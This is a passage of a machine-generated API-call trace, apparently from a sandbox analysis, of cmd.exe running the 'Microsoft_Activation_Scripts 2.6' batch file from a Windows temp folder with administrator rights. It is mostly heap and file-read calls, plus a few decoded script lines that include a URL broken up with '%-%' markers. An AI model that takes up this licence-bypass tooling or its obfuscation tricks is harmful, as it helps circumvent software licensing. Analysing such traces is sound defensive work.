Flags=0x0, BaseAddress=0x19a8f1f0090) returned 1 [0179.456] GetProcessHeap () returned 0x19a8f1e0000 [0179.457] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f21f1e0) returned 1 [0179.457] GetProcessHeap () returned 0x19a8f1e0000 [0179.458] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f21f660) returned 1 [0179.458] GetProcessHeap () returned 0x19a8f1e0000 [0179.458] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f9310) returned 1 [0179.458] GetProcessHeap () returned 0x19a8f1e0000 [0179.458] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1efee0) returned 1 [0179.458] GetProcessHeap () returned 0x19a8f1e0000 [0179.459] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f2204a0) returned 1 [0179.459] GetProcessHeap () returned 0x19a8f1e0000 [0179.459] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f21efa0) returned 1 [0179.460] GetProcessHeap () returned 0x19a8f1e0000 [0179.460] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f202060) returned 1 [0179.460] GetProcessHeap () returned 0x19a8f1e0000 [0179.460] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eff70) returned 1 [0179.460] GetProcessHeap () returned 0x19a8f1e0000 [0179.460] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f220b60) returned 1 [0179.460] GetProcessHeap () returned 0x19a8f1e0000 [0179.461] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f2203e0) returned 1 [0179.461] GetProcessHeap () returned 0x19a8f1e0000 [0179.461] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec9c0) returned 1 [0179.461] GetProcessHeap () returned 0x19a8f1e0000 [0179.461] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0e70) returned 1 [0179.461] GetProcessHeap () returned 0x19a8f1e0000 [0179.462] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0d70) returned 1 [0179.462] GetProcessHeap () returned 0x19a8f1e0000 [0179.463] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f21f420) returned 1 [0179.463] GetProcessHeap () returned 0x19a8f1e0000 [0179.464] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e08f0) returned 1 [0179.464] GetProcessHeap () returned 0x19a8f1e0000 [0179.464] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec920) returned 1 [0179.464] GetProcessHeap () returned 0x19a8f1e0000 [0179.464] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f2207a0) returned 1 [0179.464] GetProcessHeap () returned 0x19a8f1e0000 [0179.465] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f21ee20) returned 1 [0179.465] GetProcessHeap () returned 0x19a8f1e0000 [0179.465] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecd40) returned 1 [0179.465] GetProcessHeap () returned 0x19a8f1e0000 [0179.465] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec820) returned 1 [0179.465] GetProcessHeap () returned 0x19a8f1e0000 [0179.465] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f220320) returned 1 [0179.465] GetProcessHeap () returned 0x19a8f1e0000 [0179.465] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecd80) returned 1 [0179.465] GetProcessHeap () returned 0x19a8f1e0000 [0179.466] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0bf0) returned 1 [0179.466] GetProcessHeap () returned 0x19a8f1e0000 [0179.466] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e08b0) returned 1 [0179.466] GetProcessHeap () returned 0x19a8f1e0000 [0179.467] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f21f5a0) returned 1 [0179.467] GetProcessHeap () returned 0x19a8f1e0000 [0179.467] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0ff0) returned 1 [0179.467] GetProcessHeap () returned 0x19a8f1e0000 [0179.467] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecce0) returned 1 [0179.467] GetProcessHeap () returned 0x19a8f1e0000 [0179.468] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f21fea0) returned 1 [0179.468] GetProcessHeap () returned 0x19a8f1e0000 [0179.468] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f21fae0) returned 1 [0179.469] GetProcessHeap () returned 0x19a8f1e0000 [0179.469] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f02a0) returned 1 [0179.469] GetProcessHeap () returned 0x19a8f1e0000 [0179.469] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f0330) returned 1 [0179.469] GetProcessHeap () returned 0x19a8f1e0000 [0179.470] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f21f060) returned 1 [0179.470] GetProcessHeap () returned 0x19a8f1e0000 [0179.470] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f21f4e0) returned 1 [0179.470] GetProcessHeap () returned 0x19a8f1e0000 [0179.471] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f202240) returned 1 [0179.471] GetProcessHeap () returned 0x19a8f1e0000 [0179.471] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f0150) returned 1 [0179.471] GetProcessHeap () returned 0x19a8f1e0000 [0179.471] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f21f120) returned 1 [0179.472] GetProcessHeap () returned 0x19a8f1e0000 [0179.473] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f2201a0) returned 1 [0179.473] GetProcessHeap () returned 0x19a8f1e0000 [0179.473] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1efdc0) returned 1 [0179.473] GetProcessHeap () returned 0x19a8f1e0000 [0179.473] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f220ce0) returned 1 [0179.473] GetProcessHeap () returned 0x19a8f1e0000 [0179.474] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f21fd20) returned 1 [0179.474] GetProcessHeap () returned 0x19a8f1e0000 [0179.474] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f8ff0) returned 1 [0179.475] GetProcessHeap () returned 0x19a8f1e0000 [0179.475] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1efbe0) returned 1 [0179.475] GetProcessHeap () returned 0x19a8f1e0000 [0179.475] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f21fde0) returned 1 [0179.475] GetProcessHeap () returned 0x19a8f1e0000 [0179.476] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f21f360) returned 1 [0179.476] GetProcessHeap () returned 0x19a8f1e0000 [0179.476] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0b30) returned 1 [0179.476] GetProcessHeap () returned 0x19a8f1e0000 [0179.476] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f0300) returned 1 [0179.476] GetProcessHeap () returned 0x19a8f1e0000 [0179.476] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f2209e0) returned 1 [0179.476] GetProcessHeap () returned 0x19a8f1e0000 [0179.477] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f21f2a0) returned 1 [0179.477] GetProcessHeap () returned 0x19a8f1e0000 [0179.477] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0fb0) returned 1 [0179.477] GetProcessHeap () returned 0x19a8f1e0000 [0179.478] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0ab0) returned 1 [0179.478] GetProcessHeap () returned 0x19a8f1e0000 [0179.478] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb740) returned 1 [0179.478] GetProcessHeap () returned 0x19a8f1e0000 [0179.479] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f220260) returned 1 [0179.479] GetProcessHeap () returned 0x19a8f1e0000 [0179.479] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecd60) returned 1 [0179.479] GetProcessHeap () returned 0x19a8f1e0000 [0179.479] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee9d0) returned 1 [0179.479] GetProcessHeap () returned 0x19a8f1e0000 [0179.479] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb770) returned 1 [0179.479] GetProcessHeap () returned 0x19a8f1e0000 [0179.479] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec800) returned 1 [0179.480] GetProcessHeap () returned 0x19a8f1e0000 [0179.480] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee850) returned 1 [0179.480] GetProcessHeap () returned 0x19a8f1e0000 [0179.480] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee6d0) returned 1 [0179.480] GetProcessHeap () returned 0x19a8f1e0000 [0179.480] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6e0) returned 1 [0179.480] GetProcessHeap () returned 0x19a8f1e0000 [0179.480] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee550) returned 1 [0179.480] GetProcessHeap () returned 0x19a8f1e0000 [0179.481] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee490) returned 1 [0179.481] GetProcessHeap () returned 0x19a8f1e0000 [0179.481] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ef2a0) returned 1 [0179.481] GetProcessHeap () returned 0x19a8f1e0000 [0179.481] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb710) returned 1 [0179.481] GetProcessHeap () returned 0x19a8f1e0000 [0179.481] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee0d0) returned 1 [0179.481] GetProcessHeap () returned 0x19a8f1e0000 [0179.482] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee910) returned 1 [0179.482] GetProcessHeap () returned 0x19a8f1e0000 [0179.482] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eaf40) returned 1 [0179.482] GetProcessHeap () returned 0x19a8f1e0000 [0179.482] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb980) returned 1 [0179.482] GetProcessHeap () returned 0x19a8f1e0000 [0179.483] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee010) returned 1 [0179.483] GetProcessHeap () returned 0x19a8f1e0000 [0179.483] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edf50) returned 1 [0179.483] GetProcessHeap () returned 0x19a8f1e0000 [0179.483] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6b0) returned 1 [0179.483] GetProcessHeap () returned 0x19a8f1e0000 [0179.484] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edb90) returned 1 [0179.484] GetProcessHeap () returned 0x19a8f1e0000 [0179.485] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ede90) returned 1 [0179.485] GetProcessHeap () returned 0x19a8f1e0000 [0179.485] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eaed0) returned 1 [0179.485] GetProcessHeap () returned 0x19a8f1e0000 [0179.485] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb920) returned 1 [0179.485] GetProcessHeap () returned 0x19a8f1e0000 [0179.486] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee3d0) returned 1 [0179.486] GetProcessHeap () returned 0x19a8f1e0000 [0179.487] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee250) returned 1 [0179.487] GetProcessHeap () returned 0x19a8f1e0000 [0179.487] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecd20) returned 1 [0179.487] GetProcessHeap () returned 0x19a8f1e0000 [0179.487] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb9e0) returned 1 [0179.487] GetProcessHeap () returned 0x19a8f1e0000 [0179.487] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee190) returned 1 [0179.505] GetProcessHeap () returned 0x19a8f1e0000 [0179.505] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edc50) returned 1 [0179.505] GetProcessHeap () returned 0x19a8f1e0000 [0179.506] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eeea0) returned 1 [0179.506] GetProcessHeap () returned 0x19a8f1e0000 [0179.506] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb8f0) returned 1 [0179.506] GetProcessHeap () returned 0x19a8f1e0000 [0179.506] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee310) returned 1 [0179.506] GetProcessHeap () returned 0x19a8f1e0000 [0179.506] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eddd0) returned 1 [0179.506] GetProcessHeap () returned 0x19a8f1e0000 [0179.506] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb860) returned 1 [0179.506] GetProcessHeap () returned 0x19a8f1e0000 [0179.506] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec660) returned 1 [0179.506] GetProcessHeap () returned 0x19a8f1e0000 [0179.507] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb950) returned 1 [0179.507] GetProcessHeap () returned 0x19a8f1e0000 [0179.507] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee790) returned 1 [0179.507] GetProcessHeap () returned 0x19a8f1e0000 [0179.507] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb800) returned 1 [0179.508] GetProcessHeap () returned 0x19a8f1e0000 [0179.508] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec700) returned 1 [0179.508] GetProcessHeap () returned 0x19a8f1e0000 [0179.508] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edd10) returned 1 [0179.508] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.508] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1d7b [0179.508] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0179.508] SetFilePointer (in: hFile=0xa0, lDistanceToMove=7552, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1d80 [0179.508] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="cls\r\n", cbMultiByte=5, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="cls\r\nrrorlevel!==1 (start ht%-%tps://github.com/mass%-%gravel/Microsoft-Acti%-%vation-Scripts & start %mas% & exit /b)\r\n==================\r\n") returned 5 [0179.508] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.508] GetFileType (hFile=0xa0) returned 0x1 [0179.509] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.509] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1d80 [0179.509] GetProcessHeap () returned 0x19a8f1e0000 [0179.509] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f206860 [0179.509] GetProcessHeap () returned 0x19a8f1e0000 [0179.509] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0179.509] _wcsicmp (_String1="cls", _String2=")") returned 58 [0179.509] _wcsicmp (_String1="FOR", _String2="cls") returned 3 [0179.509] _wcsicmp (_String1="FOR/?", _String2="cls") returned 3 [0179.509] _wcsicmp (_String1="IF", _String2="cls") returned 6 [0179.510] _wcsicmp (_String1="IF/?", _String2="cls") returned 6 [0179.510] _wcsicmp (_String1="REM", _String2="cls") returned 15 [0179.510] _wcsicmp (_String1="REM/?", _String2="cls") returned 15 [0179.510] GetProcessHeap () returned 0x19a8f1e0000 [0179.510] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee010 [0179.510] GetProcessHeap () returned 0x19a8f1e0000 [0179.510] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec9e0 [0179.510] _tell (_FileHandle=3) returned 7552 [0179.510] _close (_FileHandle=3) returned 0 [0179.510] _wcsicmp (_String1="cls", _String2="DIR") returned -1 [0179.510] _wcsicmp (_String1="cls", _String2="ERASE") returned -2 [0179.510] _wcsicmp (_String1="cls", _String2="DEL") returned -1 [0179.510] _wcsicmp (_String1="cls", _String2="TYPE") returned -17 [0179.510] _wcsicmp (_String1="cls", _String2="COPY") returned -3 [0179.510] _wcsicmp (_String1="cls", _String2="CD") returned 8 [0179.510] _wcsicmp (_String1="cls", _String2="CHDIR") returned 4 [0179.510] _wcsicmp (_String1="cls", _String2="RENAME") returned -15 [0179.510] _wcsicmp (_String1="cls", _String2="REN") returned -15 [0179.510] _wcsicmp (_String1="cls", _String2="ECHO") returned -2 [0179.510] _wcsicmp (_String1="cls", _String2="SET") returned -16 [0179.510] _wcsicmp (_String1="cls", _String2="PAUSE") returned -13 [0179.510] _wcsicmp (_String1="cls", _String2="DATE") returned -1 [0179.511] _wcsicmp (_String1="cls", _String2="TIME") returned -17 [0179.511] _wcsicmp (_String1="cls", _String2="PROMPT") returned -13 [0179.511] _wcsicmp (_String1="cls", _String2="MD") returned -10 [0179.511] _wcsicmp (_String1="cls", _String2="MKDIR") returned -10 [0179.511] _wcsicmp (_String1="cls", _String2="RD") returned -15 [0179.511] _wcsicmp (_String1="cls", _String2="RMDIR") returned -15 [0179.511] _wcsicmp (_String1="cls", _String2="PATH") returned -13 [0179.511] _wcsicmp (_String1="cls", _String2="GOTO") returned -4 [0179.511] _wcsicmp (_String1="cls", _String2="SHIFT") returned -16 [0179.511] _wcsicmp (_String1="cls", _String2="CLS") returned 0 [0179.511] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0179.512] _wcsicmp (_String1="cls", _String2="DIR") returned -1 [0179.512] _wcsicmp (_String1="cls", _String2="ERASE") returned -2 [0179.512] _wcsicmp (_String1="cls", _String2="DEL") returned -1 [0179.512] _wcsicmp (_String1="cls", _String2="TYPE") returned -17 [0179.512] _wcsicmp (_String1="cls", _String2="COPY") returned -3 [0179.512] _wcsicmp (_String1="cls", _String2="CD") returned 8 [0179.512] _wcsicmp (_String1="cls", _String2="CHDIR") returned 4 [0179.512] _wcsicmp (_String1="cls", _String2="RENAME") returned -15 [0179.512] _wcsicmp (_String1="cls", _String2="REN") returned -15 [0179.512] _wcsicmp (_String1="cls", _String2="ECHO") returned -2 [0179.512] _wcsicmp (_String1="cls", _String2="SET") returned -16 [0179.512] _wcsicmp (_String1="cls", _String2="PAUSE") returned -13 [0179.512] _wcsicmp (_String1="cls", _String2="DATE") returned -1 [0179.512] _wcsicmp (_String1="cls", _String2="TIME") returned -17 [0179.512] _wcsicmp (_String1="cls", _String2="PROMPT") returned -13 [0179.512] _wcsicmp (_String1="cls", _String2="MD") returned -10 [0179.512] _wcsicmp (_String1="cls", _String2="MKDIR") returned -10 [0179.512] _wcsicmp (_String1="cls", _String2="RD") returned -15 [0179.512] _wcsicmp (_String1="cls", _String2="RMDIR") returned -15 [0179.512] _wcsicmp (_String1="cls", _String2="PATH") returned -13 [0179.512] _wcsicmp (_String1="cls", _String2="GOTO") returned -4 [0179.513] _wcsicmp (_String1="cls", _String2="SHIFT") returned -16 [0179.513] _wcsicmp (_String1="cls", _String2="CLS") returned 0 [0179.513] GetProcessHeap () returned 0x19a8f1e0000 [0179.513] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x14) returned 0x19a8f1ecda0 [0179.513] GetProcessHeap () returned 0x19a8f1e0000 [0179.513] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecd20 [0179.513] _get_osfhandle (_FileHandle=1) returned 0x24 [0179.513] GetFileType (hFile=0x24) returned 0x2 [0179.513] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0179.513] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x43f9efe9a8 | out: lpMode=0x43f9efe9a8) returned 1 [0179.513] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0179.513] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x24, lpConsoleScreenBufferInfo=0x43f9efe9e0 | out: lpConsoleScreenBufferInfo=0x43f9efe9e0) returned 1 [0179.514] ScrollConsoleScreenBufferW (hConsoleOutput=0x24, lpScrollRectangle=0x43f9efe9d8, lpClipRectangle=0x0, dwDestinationOrigin=0xdcd70000, lpFill=0x43f9efe9d4) returned 1 [0179.518] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0179.518] SetConsoleCursorPosition (hConsoleOutput=0x24, dwCursorPosition=0x0) returned 1 [0179.521] _get_osfhandle (_FileHandle=1) returned 0x24 [0179.521] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0179.521] _get_osfhandle (_FileHandle=1) returned 0x24 [0179.521] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0179.522] _get_osfhandle (_FileHandle=0) returned 0x20 [0179.522] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0179.522] SetConsoleInputExeNameW () returned 0x1 [0179.522] GetConsoleOutputCP () returned 0x1b5 [0179.523] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0179.523] SetThreadUILanguage (LangId=0x0) returned 0x409 [0179.523] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0179.524] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0179.524] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.524] SetFilePointer (in: hFile=0xa0, lDistanceToMove=7552, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1d80 [0179.524] GetProcessHeap () returned 0x19a8f1e0000 [0179.524] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecd20) returned 1 [0179.524] GetProcessHeap () returned 0x19a8f1e0000 [0179.524] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecda0) returned 1 [0179.524] GetProcessHeap () returned 0x19a8f1e0000 [0179.524] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec9e0) returned 1 [0179.524] GetProcessHeap () returned 0x19a8f1e0000 [0179.525] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee010) returned 1 [0179.525] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.525] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1d80 [0179.525] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0179.525] SetFilePointer (in: hFile=0xa0, lDistanceToMove=7554, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1d82 [0179.525] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\ns\r\nrrorlevel!==1 (start ht%-%tps://github.com/mass%-%gravel/Microsoft-Acti%-%vation-Scripts & start %mas% & exit /b)\r\n==================\r\n") returned 2 [0179.525] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.525] GetFileType (hFile=0xa0) returned 0x1 [0179.525] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.525] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1d82 [0179.525] GetProcessHeap () returned 0x19a8f1e0000 [0179.525] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f206860 [0179.525] GetProcessHeap () returned 0x19a8f1e0000 [0179.526] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0179.526] _tell (_FileHandle=3) returned 7554 [0179.526] _close (_FileHandle=3) returned 0 [0179.526] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0179.526] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0179.526] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.526] SetFilePointer (in: hFile=0xa0, lDistanceToMove=7554, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1d82 [0179.526] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.527] SetFilePointer (in: hFile=0xa0, 